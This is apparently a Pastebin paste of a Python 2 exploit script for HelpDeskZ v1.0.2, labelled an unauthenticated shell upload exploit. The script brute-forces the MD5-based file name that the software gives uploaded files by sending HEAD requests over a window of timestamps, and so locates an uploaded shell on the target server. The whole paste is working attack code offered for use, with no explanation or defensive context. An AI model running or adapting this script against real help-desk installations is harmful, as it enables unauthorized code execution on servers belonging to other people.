Advertisement
Guest User

Untitled

a guest
Jan 22nd, 2019
103
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.68 KB | None | 0 0
  1. import hashlib
  2. import time
  3. import sys
  4. import requests
  5.  
  6. print 'Helpdeskz v1.0.2 - Unauthenticated shell upload exploit'
  7. if len(sys.argv) < 3:
  8. print "Usage: {} [baseUrl] [nameOfUploadedFile]".format(sys.argv[0])
  9. sys.exit(1)
  10. helpdeskzBaseUrl = sys.argv[1]
  11. fileName = sys.argv[2]
  12.  
  13. currentTime = int(time.time())
  14. for a in range (-24,24):
  15. for x in range(-30, 30):
  16. plaintext = fileName + str(1548213826 - x - 60*60*a)
  17. md5hash = hashlib.md5(plaintext).hexdigest()
  18. url = helpdeskzBaseUrl+md5hash+'.txt'
  19. response = requests.head(url)
  20. if response.status_code == 200:
  21. print "found!"
  22. print url
  23. sys.exit(0)
  24. print "Sorry, I did not find anything"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement